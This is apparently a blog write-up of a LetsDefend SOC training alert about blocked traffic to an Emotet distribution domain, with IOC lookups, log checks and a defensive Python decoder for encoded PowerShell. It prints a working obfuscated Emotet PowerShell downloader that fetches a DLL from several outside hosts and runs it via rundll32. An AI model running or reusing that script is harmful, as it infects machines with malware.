4ensiX

Note: where I wrote FP I had chosen FP, but I noticed the display shows TP.

LetsDefend level 1 alert SOC111 - Traffic to Malware Domain event-id 42

Details

EventID: 42
Event Time: Jan. 30, 2021, 5:25 p.m.
Rule: SOC111 - Traffic to Malware Domain
Level: Security Analyst
Source Address: 172.16.17.19
Source Hostname: BellaPRD
Destination Address: 45.80.181.51
Destination Hostname: casinos-hub[.]com
Username: Bella
Request URL: http[:]//casinos-hub.com/s/ZQhDyLF/
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action: Blocked

Playbook

Search Log

First, check the destination IP.

45.80.181.51

VirusTotal: https://www.virustotal.com/gui/ip-address/45.80.181.51
ip-sc: https://ip-sc.net/ja/r/45.80.181.51
It is an IP in Singapore that is not flagged as a particular threat. The domain, on the other hand:

casinos-hub[.]com

VirusTotal: https://www.virustotal.com/gui/domain/casinos-hub.com
URLhaus: https://urlhaus.abuse.ch/url/972700/
Emotet!
urlscan.io: https://urlscan.io/result/9df2f694-639e-4f89-99d6-48ef765c4cb7/
So "casino hub" (?) was apparently distributing Emotet. That is the "Traffic to Malware Domain" of this alert.
I could not find out what happens after connecting there.

Log search - 45.80.181.51

#    DATE                     TYPE   SOURCE ADDRESS  SOURCE PORT  DESTINATION ADDRESS  DESTINATION PORT
335  Jan, 30, 2021, 05:25 PM  Proxy  172.16.17.19    13212        45.80.181.51         80

The log only contains the single access from the time the alert was raised.

URL: http://casinos-hub.com/s/ZQhDyLF/
Device Action: Blocked

Analyze URL Address

We already established above that this is Emotet, so:
Answer: Malicious

Has Anyone Accessed IP/URL/Domain?

The access was blocked.

Device Action Blocked

Answer: Not Accessed

Add Artifacts

Value                                Type         Comment
45.80.181.51                         IP Address   casinos-hub[.]com in Singapore
http[:]//casinos-hub.com/s/ZQhDyLF/  URL Address  Emotet download

Incidentally,

Endpoint - BellaPRD

in Process History the execution of a suspicious PowerShell script can be seen.

powershell -w hidden -enc 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

-> after base64 decoding:

seT-ITEm ('VARiAB'+'LE:'+'UeB5p')  (  [TyPe]("{0}{4}{5}{2}{1}{3}{6}"-F 's','di','O.','rEct','YsTE','M.i','Ory'));  $Xv05be  =  [tYPE]("{4}{1}{3}{5}{6}{0}{2}{7}" -f 'icEpoin','n','TmaNA','e','sYsTem.','T.S','eRV','GeR') ; $Pudbt67=$H_9J + [char](33) + $H07L;$D19Q=('Z'+('18'+'F')); (VaRIaBLe ('ueB5'+'p')  -vALuEO )::"Cr`e`A`TE`dIrecTOry"($HOME + ((('Z7'+'B'+'Aa7jfxj')+'Z'+('7B'+'Pwqr'+'3d'+'0Z7')+'B')."re`pLAce"(('Z7'+'B'),'\')));$D04E=('T2'+'8X');  (  cHilDITEm ("v"+"ArIaBLE:XV"+"0"+"5Be") ).VaLUe::"S`ECURiT`YPR`oto`COL" = ('T'+('ls'+'12'));$F67O=('N'+('26'+'J'));$V8xjubf = ('E'+('4'+'0T'));$G2_P=('L1'+'0L');$Ytn2v6z=$HOME+(('{'+'0'+'}A'+'a7jfxj{0}P'+'wqr3d0{'+'0}')  -f  [ChaR]92)+$V8xjubf+'.d' + 'll';$K87N=('D'+('3'+'8V'));$Vez3jmc='h' + 'tt' + 'p';$Ukeknom=(('sg'+' yw a')+('h:/'+'/y')+('ah'+'yal')+'is'+('a'+'yam.')+('com/sy'+'s-c'+'ac')+'he'+('/tAsw/!'+'s'+'g')+(' y'+'w ah:')+('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')+('QhDy'+'LF/!'+'sg y')+('w'+' ah://d'+'eodi')+('ta'+'s')+('.c'+'o')+('m'+'/n/FUE')+('yoG/!s'+'g ')+('yw '+'ah')+(':/'+'/m'+'ts2019-00')+'2-'+'si'+('te'+'9.gte'+'mp')+('u'+'rl.c')+'om'+('/w'+'p')+'-'+'co'+('nt'+'ent/E'+'/')+'!'+'s'+'g'+(' yw '+'ah'+'s://')+'o'+('ce'+'an4gamer'+'s.'+'co')+('m'+'/wp-co')+('n'+'tent/GA')+('uY'+'f/')+'!'+('sg '+'yw ')+('ah://acad'+'emi'+'a')+('pr'+'ogr'+'e')+'so'+('.'+'c'+'om/cg')+('i'+'-b')+('in/Z5/'+'!'+'sg'+' ')+('yw'+' ahs'+':/')+('/newto'+'p'+'.one')+('/r'+'es')+('p'+'onsive')+('s'+'/z/'))."r`EpLA`ce"((('sg'+' ')+'y'+('w '+'ah')),([array]('nj','tr'),'yj','sc',$Vez3jmc,'wd')[3])."spl`IT"($P53W + $Pudbt67 + $W64N);$V16S=('P'+('31'+'L'));foreach ($Oppvsjc in $Ukeknom){try{(&('N'+'ew-Obje'+'ct') SysTem.net.WEBClIENT)."dOW`Nl`Oadf`ile"($Oppvsjc, $Ytn2v6z);$E82E=('V'+('6'+'_O'));If ((&('Get'+'-I'+'tem') $Ytn2v6z)."le`NgTh" -ge 41385) {.('rund'+'l'+'l32') $Ytn2v6z,(('A'+'nySt')+'r'+('i'+'ng'))."T`os`TRiNg"();$Q_7W=('Y1'+'2O');break;$S41O=('E'+('0'+'0F'))}}catch{}}$D38Z=(('H1'+'6')+'Q')

Looking at its contents,

('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')

an access to casinos-hub.com is visible. The execution of this script is what this alert relates to. I could not find out what caused it to run.
Looking at the other Endpoint logs, there are entries after this point, but there is no log of any activity before it, so that part remains unknown. This kind of thing is usually a VBA macro, I suppose.
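As an added example (not code from the post or from LetsDefend), here is a small triage helper for exactly this kind of process-history entry: it decodes a "powershell -w hidden -enc" command line, undoes the string-concatenation and backtick tricks seen in the decoded script above, and returns the URLs and behaviours a detection rule would key on. The command line it runs on is constructed from a fragment written in the same style as the script above, not the real encoded blob.

```python
import base64
import re
# Constructed sample in the style of the decoded script above (not the post's real blob)
SAMPLE_SCRIPT = (
    "$u=('h'+'tt'+'p')+(':'+'//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')+('QhDy'+'LF/');"
    "(&('N'+'ew-Obje'+'ct') SysTem.net.WEBClIENT).\"dOW`Nl`Oadf`ile\"($u,$p);"
    ".('rund'+'l'+'l32') $p"
)
# powershell -enc takes base64 of the UTF-16LE script, so the sample is encoded the same way
SAMPLE_CMDLINE = "powershell -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden")
BACKTICK_MEMBER = re.compile(r'"([A-Za-z]*`[A-Za-z`]*)"')  # "dOW`Nl`Oadf`ile"
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")         # 'a'+'b' -> 'ab'
PAREN_LITERAL = re.compile(r"\('([^']*)'\)")               # ('ab') -> 'ab'
URL = re.compile(r"https?://[^\s'\")]+")
# Behaviours worth a hit once the string tricks are undone
BEHAVIOUR = [(n, re.compile(n, re.I)) for n in
             ("downloadfile", "webclient", "new-object", "rundll32")]

def decode_encoded_command(cmdline):
    # Returns the decoded script for a "-enc" command line, None otherwise
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)  # pad again in case the logger stripped trailing "="
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le", errors="replace")

def collapse(script):
    # Undo the cheap obfuscation layers until a pass changes nothing
    prev = None
    while prev != script:
        prev = script
        script = BACKTICK_MEMBER.sub(lambda m: '"%s"' % m.group(1).replace("`", ""), script)
        script = CONCAT.sub(r"'\g<1>\g<2>'", script)
        script = PAREN_LITERAL.sub(r"'\g<1>'", script)
    return script

def triage(cmdline):
    # Decode, deobfuscate and score one process command line; None if it is not "-enc"
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    plain = collapse(decoded)
    return {"hidden": bool(HIDDEN_FLAG.search(cmdline)), "urls": URL.findall(plain),
            "concat_chains": len(CONCAT.findall(decoded)),
            "backtick_members": len(BACKTICK_MEMBER.findall(decoded)),
            "hits": [n for n, rx in BEHAVIOUR if rx.search(plain)], "script": plain}
```

Run over the real entry, the "urls" list is where the casinos-hub.com path surfaces, and "hidden" plus several "hits" together is the combination a rule would alert on.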

End

Close alert, event ID 42.

I could not determine how the PowerShell that downloaded Emotet came to be executed, but it was interesting to get a rough picture of the chain leading up to the alert rather than just the alert on its own.
If possible, though, I would like the steps before and after to be preserved as Endpoint logs as well.
Perhaps they do not do that because keeping and generating large volumes of logs is hard.